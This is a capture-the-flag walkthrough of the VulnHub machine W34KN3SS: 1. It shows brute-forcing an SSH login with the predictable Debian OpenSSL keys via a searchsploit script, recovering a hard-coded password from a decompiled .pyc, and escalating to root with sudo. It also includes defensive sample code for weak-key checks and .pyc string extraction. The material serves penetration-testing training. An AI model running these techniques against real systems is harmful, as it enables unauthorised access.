Introduction

The matrix is controlling this machine. Neo is trying to escape from it and take back control of it, and your goal is to help Neo gain access as “root” to this machine. Through this machine you will need to perform hard enumeration on the target and understand what the main idea of it is, and exploit every possible “weakness” that you can find; you will also be facing some abnormal behaviours while exploiting this machine.

This machine was made for Jordan’s Top Hacker 2018 CTF. We tried to make it simulate real-world attacks “as much as possible” in order to improve your penetration testing skills, and we also put a few tricky techniques in it so you can learn some unique skills.

Difficulty: Intermediate. You need to think outside the box and collect all the puzzle pieces in order to get the job done.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s W34KN3SS: 1 from vulnhub. It’s got a mild Matrix theme.

Ports

This box has SSH, HTTP and HTTPS on the standard ports (22, 80 and 443). A detailed scan, or viewing the SSL certificate, gives some useful information:

Organization weakness.jth
Common Name weakness.jth
Email Address n30@weakness.jth

I add weakness.jth to /etc/hosts.

HTTP/HTTPS and hints

I enumerate the web services with gobuster and turn up a few things:

At https://192.168.1.106/test/ we get a meme with some text:

it’s all about keys :D

At http://weakness.jth/ we get a message from n30 - same user as in the email address on the SSL certificate.

At http://weakness.jth/private/ we find an SSH public key and a note, with the text:

this key was generated by openssl 0.9.8c-1

OpenSSL

This version of OpenSSL had a bug that reduced the available keyspace:

When creating a new OpenSSH key, there are only 32,767 possible outcomes for a given architecture, key size, and key type.

This means we can try every possible key to see if one works, hence the hint about needing lots of keys. I used the Python exploit code from searchsploit:

root@kali:/opt/vulnhub/w34kn3ss# python 5720.py ./5622/rsa/2048/ 192.168.1.106 root 22 5

Which found a working key for our user n30:

Key Found in file: 4161de56829de2fe64b9055711f531c1-2537
Execute: ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537 192.168.1.106

Tested 3429 keys | Remaining 29339 keys | Aprox. Speed 15/sec
# ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537 192.168.1.106
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
New release '20.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1
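The same key-space flaw can be checked for from the defender's side: Debian shipped the known-weak fingerprints as openssh-blacklist, with ssh-vulnkey as the checker. The script below is an added example, not code from this writeup or from the exploit; it builds two constructed ssh-rsa lines (toy numbers, not real keys), fingerprints them, and flags any whose fingerprint is in a blacklist set, assuming the blacklist stores MD5 fingerprints with their first 12 hex characters dropped.

```python
import base64
import hashlib
import struct


def ssh_string(b: bytes) -> bytes:
    """One SSH wire-format string: uint32 big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def ssh_mpint(n: int) -> bytes:
    """SSH mpint: minimal big-endian bytes, with a leading 0x00 if the top bit is set."""
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_rsa_pubkey_line(e: int, n: int, comment: str) -> str:
    """Build an OpenSSH 'ssh-rsa' line; the numbers used here are constructed, not real keys."""
    blob = ssh_string(b"ssh-rsa") + ssh_mpint(e) + ssh_mpint(n)
    return "ssh-rsa %s %s" % (base64.b64encode(blob).decode(), comment)


def md5_fingerprint(pubkey_line: str) -> str:
    """Hex MD5 of the decoded key blob (what `ssh-keygen -l -E md5` shows, minus the colons)."""
    return hashlib.md5(base64.b64decode(pubkey_line.split()[1])).hexdigest()


def blacklist_entry(pubkey_line: str) -> str:
    """openssh-blacklist form (assumption): the MD5 fingerprint without its first 12 hex chars."""
    return md5_fingerprint(pubkey_line)[12:]


def weak_keys(authorized_keys: str, blacklist: set) -> list:
    """Comments of the keys in an authorized_keys text whose fingerprint is blacklisted.
    Assumes plain 'type blob comment' lines with no options prefix."""
    hits = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if blacklist_entry(line) in blacklist:
            hits.append(parts[2] if len(parts) > 2 else "<no comment>")
    return hits


# Constructed sample data: two tiny "keys" and a blacklist that lists the first one.
WEAK_KEY = make_rsa_pubkey_line(65537, 0xC0FFEE_DEAD_BEEF_1234_5678, "n30@weakness.jth")
OK_KEY = make_rsa_pubkey_line(65537, 0xBADC0DE_CAFE_F00D_4242_9999, "admin@example.invalid")
BLACKLIST = {blacklist_entry(WEAK_KEY)}
AUTHORIZED_KEYS = "# constructed authorized_keys\n%s\n%s\n" % (WEAK_KEY, OK_KEY)

if __name__ == "__main__":
    print("blacklisted keys:", weak_keys(AUTHORIZED_KEYS, BLACKLIST))
```

Against a real host you would load the fingerprints from the distribution's blacklist files and walk every authorized_keys and host key, since a key that appears in a 32,767-entry set is trivially reproducible by anyone.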

Privesc

Our user n30 is a member of the sudo group, and in his home directory is an interesting file called code. The file is a compiled Python script:

n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiled

If we run it, we get this:

n30@W34KN3SS:~$ which python
/usr/bin/python
n30@W34KN3SS:~$ python code
[+]System Started at : Wed Nov 18 12:28:29 2020
[+]This binary should generate unique hash for the hardcoded login info
[+]Generating the hash ..
[+]Your new hash is : 9d3318d8beb128b1c85c9590fbf12c695b4a23ad7040492f67b59d4c4c28f858
[+]Done

Did someone say hardcoded login info?

Uncompyle

I copy the binary over to Kali and try to run uncompyle6 on it; that fails for some reason. Something is going on with Python versions, but it’s not immediately clear what. Instead I set up a Python virtual environment, clone the uncompyle2 repo from GitHub into it and decompile the file there, so there are no mix-ups with versions. The sequence of commands was broadly this (taken from my bash history):

2038  apt-get install python3-venv
2067  mkdir uncompyle2
2068  cd uncompyle2
2069  git clone https://github.com/wibiti/uncompyle2 .
2071  virtualenv -p /usr/bin/python2.7 venv2
2072  source venv2/bin/activate
2073  ls
2074  python setup.py install
2075  uncompyle2 /opt/vulnhub/w34kn3ss/code
2076  uncompyle2 /opt/vulnhub/w34kn3ss/code > out
2077  ls
2078  file out
2079  cat out

So what’s in out? Effectively it’s our credentials, with some other stuff that’s not important:

n30:dMASDNB!!#B!#!#33
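A decompiler is not even needed to pull a secret out of a .pyc: string literals survive byte-compilation as constants on the code object. This is an added example, not code from the writeup or the box; it byte-compiles a constructed stand-in for the code file (placeholder password, not the real one) and walks the marshalled code object's constants, assuming a CPython 3.7+ .pyc layout.

```python
import marshal
import py_compile
import tempfile
import types
from pathlib import Path

# Constructed stand-in for the box's "code" file: a script that hard-codes
# the login info it hashes. The password is a placeholder, not the real one.
SAMPLE_SOURCE = '''
import hashlib, time
USER = "n30"
PASSWORD = "placeholder-hardcoded-secret"

def main():
    print("[+]System Started at : " + time.ctime())
    digest = hashlib.sha256((USER + PASSWORD).encode()).hexdigest()
    print("[+]Your new hash is : " + digest)
'''

def compile_to_pyc(source: str, workdir: Path) -> Path:
    """Byte-compile the sample into an extension-less file, as on the box."""
    src = workdir / "code.py"
    src.write_text(source)
    pyc = workdir / "code"
    py_compile.compile(str(src), cfile=str(pyc), doraise=True)
    return pyc

def walk_strings(code: types.CodeType):
    """Yield every str constant reachable from a code object, recursing into
    nested functions and classes (their code objects sit in co_consts)."""
    for const in code.co_consts:
        if isinstance(const, str):
            yield const
        elif isinstance(const, types.CodeType):
            yield from walk_strings(const)

def strings_from_pyc(path: Path) -> list:
    """Recover string constants without a decompiler. Assumes the CPython 3.7+
    .pyc layout: 16-byte header (magic, flags, mtime/hash, size), then the
    marshalled module code object. Python 2.7 files use an 8-byte header."""
    data = path.read_bytes()
    return list(walk_strings(marshal.loads(data[16:])))

def demo() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        return strings_from_pyc(compile_to_pyc(SAMPLE_SOURCE, Path(tmp)))

if __name__ == "__main__":
    print("\n".join(demo()))
```

The takeaway for the defender is that byte-compiling a script gives hard-coded credentials no protection at all; the only fix is not to embed them.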

Privesc

With our credentials and membership of the sudo group, it’s game over:

n30@W34KN3SS:~$ sudo su
[sudo] password for n30: 
root@W34KN3SS:/home/n30# cd /root
root@W34KN3SS:~# ls -lash
total 44K
4.0K drwx------  4 root root 4.0K Aug 14  2018 .
4.0K drwxr-xr-x 22 root root 4.0K May  5  2018 ..
4.0K -rw-------  1 root root    6 Aug 14  2018 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K drwx------  2 root root 4.0K Aug 14  2018 .cache
4.0K drwxr-xr-x  3 root root 4.0K May  5  2018 .local
4.0K -rw-------  1 root root  114 May  5  2018 .mysql_history
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.0K May  5  2018 .rnd
4.0K -rw-r--r--  1 root root   33 May  8  2018 root.txt
4.0K -rw-r--r--  1 root root   66 Aug 14  2018 .selected_editor
root@W34KN3SS:~# cat root.txt
a1d2fab76ec6af9b651d4053171e042e

Goodbye, Mr Anderson.